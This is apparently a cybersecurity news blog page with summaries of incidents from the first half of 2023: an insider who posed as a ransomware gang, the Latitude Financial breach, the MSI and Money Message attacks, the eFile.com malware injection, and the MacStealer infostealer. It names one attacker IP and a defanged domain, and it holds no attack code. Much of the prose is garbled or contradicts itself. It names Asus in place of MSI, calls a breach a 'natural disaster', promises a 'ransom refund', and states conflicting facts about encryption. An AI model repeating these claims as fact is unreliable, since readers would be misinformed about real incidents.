As a result of a clash with European regulator Garante in March, OpenAI first faced regulators during its domestic launch. The company was accused of flouting data privacy rules in Europe. In an updated privacy measure, ChatGPT has committed to users' privacy and restored the chat service.
Read more »
SEROUC
Cyber Attacks CyberCrime cybercriminals Cyberfraud Cybersecurity Ransomware SEROUC

Using Ransomware to Extort Employers by Impersonating a Gang

 


In a court in Fleetwood, Hertfordshire, a 28-year-old United Kingdom man has been found guilty of serving his employer with a forged document and unauthorized access to his computer with criminal intent. 

SEROCU has released a press release explaining the conviction of Ashley Liles, a 29-year-old IT Security Analyst at a company in Oxford that was the victim of a ransomware attack in February 2018. According to the press release, Liles worked as an IT Security Analyst at the time. 

The cybercriminals contacted the company's executive team to demand a ransom payment, the same plan used in many ransomware attacks.

As part of the company's internal investigation efforts and the incident response initiative, Liles, as well as other company members and members of the police, joined the investigation and incident response effort. 

As a result, during this period, it is said that Liles tried to enrich himself from the attack by tricking his employer into paying him a ransom instead of the actual external attacker to enrich himself. 

The SEROCU announcement reads, "Instead of pursuing a criminal case against the company, Liles also began a further and secondary attack against the company unbeknownst to the police, his colleagues, or his employer." 

In addition to accessing more than 300 times the private emails of a board member, he also altered the original blackmail email sent by the original attacker and changed the payment information provided by the original attacker. 

A plan had been hatched to take advantage of the situation by diverting the payment from the payment account and sending it to Liles' cryptocurrency wallet. 

In addition to creating an almost identical email address, Lite created another email address that looked almost identical to the original attacker, and sent emails to his employer asking for payment, said SEROCU. 

Although the company owner refused to pay the attackers, a later internal investigation that had been underway at the time revealed that Liles had access to private emails, as evidenced by the IP address of his home, suggesting that he was responsible for the attack. 

By the time SEROCU's cyber-crime team stormed into Liles' home to take his computer, Liles was well aware of the investigation and had wiped all data from his devices. However, restoring incriminating data from Liles' computer was still possible, even though he had realized the investigation was closing in on him. 

During the hearing at Reading Crown Court, Liles pleaded guilty five years after he first denied any involvement in the case and pleaded guilty a second time. There is going to be a court date for this rogue employee on July 11th, 2023, he will be sentenced at that time.

Accusing someone of hacking into a computer without their permission is punishable by up to two years in prison in the UK, while blackmail is punishable by up to 14 years in prison.
Read more »
Passport
Coles Cyberfraud Data Breach Information Leak Latitude Financial Passport

Latitude Financial Breaches Customer Data, Coles Warns

 


In an attempt to verify if the breach of Latitude Financial data was impacting Coles, the supermarket giant has confirmed it has. As part of the report, the company alleges that a cybercriminal gang has stolen the information used to issue previous Coles credit cards. 

Within the 14 million stolen customer records, there was information regarding 7.9 million driver's licenses and about 53,000 passport numbers that were among the data stolen from the hack, which was detected last month. According to the company's report, this data breach occurred in March 2023 and was reported to the regulators. 

As a result of the breach, Latitude Financial Services has notified Coles of the issue and is in the process of reaching out to all affected clients. 

The breach compromised thousands of passport numbers, along with personal information such as driver's license numbers, names, addresses, dates of birth, and other personal information. This included thousands of driver's license numbers. 

Despite this, the supermarket giant has not yet been informed of the number of customer accounts that have been affected by this incident. 

Despite Coles' assertions, he has yet to release any further information regarding this data breach incident. A data breach reported by Latitude Financial has confirmed that historically Coles credit card owners have been affected by the breach. Several customers have been affected and a Latitude Financial spokesperson is contacting them. “In March 2018, Coles Financial Services moved its credit cards to Citibank,” a Coles spokeswoman said. 

There has been a confirmed contact between Latitude and the group behind the hack. The group sent Latitude a ransom note demanding payment. 

The company is taking a variety of measures to provide support and information to customers affected by the loss of their personal information and to inform them about what happened. 

Even though a third-party platform was likely involved in the breach, this information has not been released by Latitude, nor have the criminals revealed who they are. 

Additionally, the firm has established a contact center in Australia and New Zealand to assist individuals affected by this natural disaster. It was further assured that if any of the stolen identification documents needed to be replaced, the company would reimburse the affected customers. 

There have been multiple attempts made to contact Myer as well as Latitude Financial - both of which have branded Visa credit cards through GE Money. 

There are several major retailers, such as Harvey Norman, The Good Guys, JB HI-Fi, Apple, and Amart Furniture, that offer interest-free credit cards and personal loans through Latitude Financial, which used to be known as GE Money. This is one of the most significant data breach that ever took place in Australia. 
Read more »
TWSE
BIOS/UEFI Cyber Attacks CyberCrime Cyberfraud firmware Monet Message MSI PCMag Software TWSE

Firmware Caution Advises MSI Cyberattack

 


Aside from gaming hardware manufacturers, modern corporations face constant attacks from malicious hackers and other digital no-goodniks. Corporations are not the only ones attacked by malicious hackers. MSI confirmed to its customers it had been attacked. 

MSI has enumerated its responsibility for how much damage has been caused. As a result, the company threatened to release proprietary software and source code. It has been reported that the Taiwanese computer manufacturer MSI (short for Micro-Star International)'s network has been compromised in a cyberattack. 

As reported earlier this week, a ransomware group has infiltrated MSI systems with the help of the Money Message ransomware attack. Unless the company pays a $4 million ransom fee to the hackers, well-protected corporate data will be released online next week. 

Asus advises all of its customers to ensure the latest BIOS and firmware updates are delivered only to the MSI website and not from anywhere else.

As expected, there are not many details, but it seems that MSI initiated "defense mechanisms and recovery measures" after detecting network anomalies and then notified law enforcement and the government. 

Earlier this week, in a filing with Taiwan's Stock Exchange (TWSE), first spotted by PCMag, MSI revealed that a cyberattack had occurred against some of its information service systems. The terrorist attack has been reported to the appropriate authorities. 

This group of criminals is demanding a $4 million ransom to avert the release of the entire data cache available on the web by the criminals. Although MSI does not specify details, the company warns customers not to download BIOS/UEFI files or firmware from any source other than the company's website. In light of this, it appears that compromised software is a current problem in the wild. 

It has been reported yesterday that there has been a cyberattack against the customer. The report stated that the attacker, a ransomware group called Money Message, has claimed to have stolen source code, a framework for developing bios and private keys. 

Moreover, the chat logs on this site showed that the group claimed to have stolen 1.5 TB of data. They wanted a ransom payment of over four million dollars for the stolen data. Whether these are connected or if MSI paid a ransom for these files is unclear. 

In a report, MSI representatives said that the company regained normal operations after restoring its systems. They have seen a minimal impact of the attack on their day-to-day operations. As long as customers exercise the usual level of due diligence when downloading software, drivers, and updates, they should not have too much to worry about if the company is telling the truth. According to rumors, this hack is unrelated to fraudulent emails in February. These emails purported to offer lucrative sponsorship deals to content creators through MSI.

In addition, MSI advises its customers to stick to the official MSI website exclusively for BIOS and firmware updates. This is preferable to downloading from unreliable sources like unknown websites or torrent download sites. If users search for unofficial - yet perfectly safe - firmware dumps on the internet for their devices, it would be rather pointless for them to look for modified or unofficial firmware dumps that are perfectly safe.
Read more »
Website Fraud
Cyberattacks cybercriminals Cyberfraud Cybersecurity malware Tax-Filing Website Fraud

eFile.com Hosted Malware on its Website

 


Malicious code was injected into eFile.com's server, an online service that assists people with filing tax returns. This resulted in malware being delivered to users' computers. 

It was discovered that the software service, which is authorized by the Internal Revenue Service (IRS), despite not being operated by its agent, was serving malware for several weeks before it was cleaned up earlier this week. 

This is the official IRS format for filing tax documents online - or electronically - and usually without printing any documents. The IRS recommends this format for all federal tax filings. Even though external services can pose additional security risks, citizens can use software programs or websites to submit their tax returns.

US citizens' tax-filing deadline on April 18th is getting closer and closer. Cyber-criminals are exploiting the deadline to increase their malicious campaigns against tax-filing services and users to gain access to their private information. In recent weeks, the eFile.com online platform has become one of the most popular sites for filing tax returns. As such, it has again become a victim of tax-related cybercrime. 

The security incident particularly affects eFile.com and not IRS' e-file infrastructure or domains with the same sounding name or similar sounding domains. 

There is also additional JS code loaded from about amanewonliag dot online in addition to the base64 encoded script. If the user chooses to run the malware advertisement, they will be asked to download an executable file named "update.exe" or "installer.exe" depending on the browser they are using. 

Upon further inspection, researchers found a PHP backdoor in the executable binaries. Backdoors of this kind are designed to connect with IP addresses located in Tokyo, such as 47.245.6.91 hosted by Alibaba Corporation. Similarly, when the malicious script popper.js pinged the infoamanewonliag domain, the same IP address hosted the infoamanewonliag domain. 

In mid-March, a Reddit user initially reported that the eFile.com website had been compromised, with visitors being redirected to a fake 'network error' page as well as with a false browser update being served to them. 

If the user clicks on the link for a browser update, they will be served either the update.exe file or the installer.exe file, depending on the operating system. In a recent research paper published by the SANS Internet Storm Center, Johannes Ullrich pointed out that malicious files were being detected far less frequently than healthy files on VirusTotal. 

Furthermore, he discovered that 'update.exe' was signed with a valid certificate emanating from a company named Sichuan Niurui Science and Technology Co., Ltd.

In a follow-up post, Ullrich explains that the analysis of update.exe shows it to be a Python downloader, which fetches a PHP script, that establishes communication with the command-and-control server, which is further used to send messages to the attacker. 

Considering the analysis of a sample of the PHP script’s that was seen by MalwareHunterTeam, it was determined to be a backdoor malware. Threat actors can then access the device remotely through this method, allowing them to take control of it remotely. 

PHP scripts are installed in the background during malware distribution. 

The malware continually engages a remote command and control server that is controlled by threat actors every ten seconds to communicate with them. As soon as the malware receives a task to run on the device that is infected, it will begin working on it. 

As a backdoor, the eFile backdoor offered the very basics of what malicious software would provide, but it was still dangerous enough to give cybercriminals full access to a Windows PC with the backdoor, giving them the leverage to attack other systems on a corporate network. 

The company eFile.com is yet to explain what happened. LockBit ransomware has been linked to a cyber gang named OLOC that claims to have already attacked the website in January 2022. 

According to the researcher, this malicious JavaScript code was also removed by eFile from the website on the 3rd of April. The attackers tried to eliminate the infection themselves before the incident, probably to cover up their tracks after the infection had been removed. There is apparent malicious code that has been injected into every page on eFile.com as a part of the malware attack.
Read more »
Vulnerabilities and Exploits
and Ransomware cybercriminals Cyberfraud Cybersecurity malware Threat actors Vulnerabilities and Exploits

Million-Dollar Ransom Demanded by Ransomware Gang 

 


On the threat landscape in recent years, alarming numbers of ransomware groups sprung up. This is just as mushrooms grow from the ground after a shower. 

In recent months, an emerging ransomware group called 'Money Message' has appeared. This group targets victims worldwide and demands ransoms of up to a million dollars to safeguard confidential data. In addition to the Chinese airline with annual revenue of approximately $1 billion, there have been at least two other victims of the group's activities. A screenshot of the accessed file system is provided as proof that the group claims to have stolen data from the company. After that, five more successful ransomware attacks have been reported, the latest being on April 4. 

Money Message has currently listed two victims on its leak site - an Asian airline with over $1 billion in assets and an unnamed vendor of computer hardware that deals in personal computers. Ransomware encryptors are also written in C++ and contain a JSON configuration file embedded into the code. This file is used to determine the encryption process on the victim's device. 

In this configuration file, you can specify which folders will be blocked from encryption by this setting. As part of this document, you will also find information regarding what extensions should be added, what services and processes should be terminated, whether logging is enabled, as well as likely domain login names and passwords that would be used to encrypt other devices. The victim can contact the threat actors via a link provided. 

The victim will be able to reach a Tor negotiation site. Although Money Message uses an encryptor that is not as advanced as ChaCha20/ECDH encryption, its operation still encrypts devices and steals data even if the encryption method used is not very sophisticated. There is no append extension when encrypting files, however, you can change this according to the type of victim you are encrypting. As per Rivitna, a security researcher who has worked on encrypted files for more than a decade, the encryptor uses ChaCha20 and ECDH encryptions. 

In the latest posting from Money Message, the company has also been playing up the dramatics. This gang has put up a reveal counter on their website, which reportedly counts down to the moment that they reveal the target and that the data they have will be published. 

The ransomware then creates a ransom note titled ‘money_message.log’ that contains a link that is used as a means of negotiating with threat actors after encrypting the device. We will explore this further on. 

In addition, if the ransom is not paid, any stolen information will be published on the company's data leak site. This will enable you to receive a ransom refund. 

Upon publishing a document containing the information of travelers, Money Message published a report after three days. 

Additionally, an insurance company in the United States, as well as a distributor of iron and glass products were affected. Money Message extorted a lot of money from its users over the years, and when that ransom was not paid, the exfiltrated data was published in the public domain. 

As Money Message appears not to be a sophisticated malware threat, it is still a serious threat to businesses, as it targets them, steals data from them, and extorts them for money. 

As a result, a growing number of ransomware groups are frequently emerging highlighting the fact that there are more and more threats against organizations each day. Take measures to ensure that your privacy is protected by implementing proper security measures.   
Read more »
Privacy
Cyberattacks CyberCrime Cyberfraud iCloud MaaS Malwares Passwords Privacy

iCloud Keychain Data and Passwords are at Risk From MacStealer Malware

 


Uptycs, a cybersecurity company that discovered the information-stealing malware while searching for threats on the dark web, is warning that Mac computers have been the latest targets of updated info-stealing malware. 

The iCloud Keychain can easily access cryptocurrency wallets with the help of MacStealer. This is an innovative malware that steals your credentials from your web browsers, cryptocurrency wallets, and potentially sensitive files stored in your iCloud Keychain. 

The MacStealer malware is distributed as malware-as-a-service (MaaS), whereby the developer sells pre-built builds for $100, allowing customers to run their marketing campaigns and spread the malware to their victims. 

On the dark web, cybercriminals use Mac computers as a breeding ground to launch malware and conduct illegal activities. This makes the dark web a prime place to conduct illegal activities and launch malware. 

Upon discovering the newly discovered macOS malware, the Uptycs threat research team reported that it could run on multiple versions of Mac OS. This included the current Mac OS, Catalina (10.15), and the latest and greatest Apple OS, Ventura (13.2). 

Sellers claim that the malware is still in beta testing and that there are no panels or builders available. In China, Big Sur, Monterey, and Ventura provides rebuilt DMG payloads that infect macOS with malware. 

To charge a low $100 price for a piece of malware without a builder and panel, the threat actor uses this fact. Despite this, he will release more advanced features as soon as possible. 

A new threat named MacStealer is using Telegram as a command and control (C2) platform to exfiltrate data, with the latest example being called PharmBot. There is a problem that affects primarily computers running MacOS Catalina and later with CPUs built on the M1 or M2 architecture. 

According to Uptycs' Shilpesh Trivedi and Pratik Jeware in their latest report on the MacStealer exploit, the tool steals files and cookies from the victim's browser and login information. 

In its first advertising on online hacking forums at the beginning of the month, this project was advertised for $100, but it is still far from being finished. There is an idea among the malware authors of adding features to allow them to access notes in Apple's Notes app and Safari web browser. 

Functioning of Malware

MacStealer is distributed by the threat actors using an unsigned DMG file which is disguised as being something that can be executed on Mac OS if it is tricked into going into the system.

As a result, the victim is presented with a fake password prompt to run the command, which is made to look real. The compromised machine becomes vulnerable to malware that collects passwords from it. 

Once it has collected all the data described in the previous section, the malware then begins to spread. As soon as the stolen data is collected, it is stored in a ZIP file. It is then sent to a remote server for processing and analysis. Later on, the threat actor will be in a position to collect this information as well.

Additionally, MacStealer is also able to send some basic information to a pre-configured Telegram channel, which allows the operator to be notified immediately when updates to the stolen data have been made, which will enable him to download the ZIP file immediately as well.

What can You do to Protect Your Mac?

You can do a few things right now to ensure that you have the latest software update installed on your Mac computer, beginning with opening the Settings app and checking that it is the latest version. 

The first thing you should do is install it as soon as possible if it has not been installed already. You should make sure that all of your Apple devices are up-to-date before you begin using them since Apple is constantly improving its security. 

Your devices will be protected from malware if you use antivirus software, which protects you from potentially malicious links on the internet. By clicking the magnifying glass icon at the top of my webpage, you can find my expert review of the highest-rated antivirus protection for your Windows, Mac, Android, and iOS devices, which includes reviews of which ranked antivirus protection for Windows, Mac, Android, and iOS devices.  

Different forms of malware, such as email attachments, bogus software downloads, and other techniques of social engineering, are utilized to spread stealer malware. 

Keeping up-to-date the operating system and security software of the computer is one of the best ways to mitigate such threats. In addition, they should not download files from unknown sources or click on links they find on the internet. 

"It becomes more important for data stored on Macs to be protected from attackers as Macs become more popular among leadership teams as well as development and design teams within organizations", SentinelOne researcher Phil Stokes said in a statement last week.
Read more »
Subscribe to: Posts (Atom)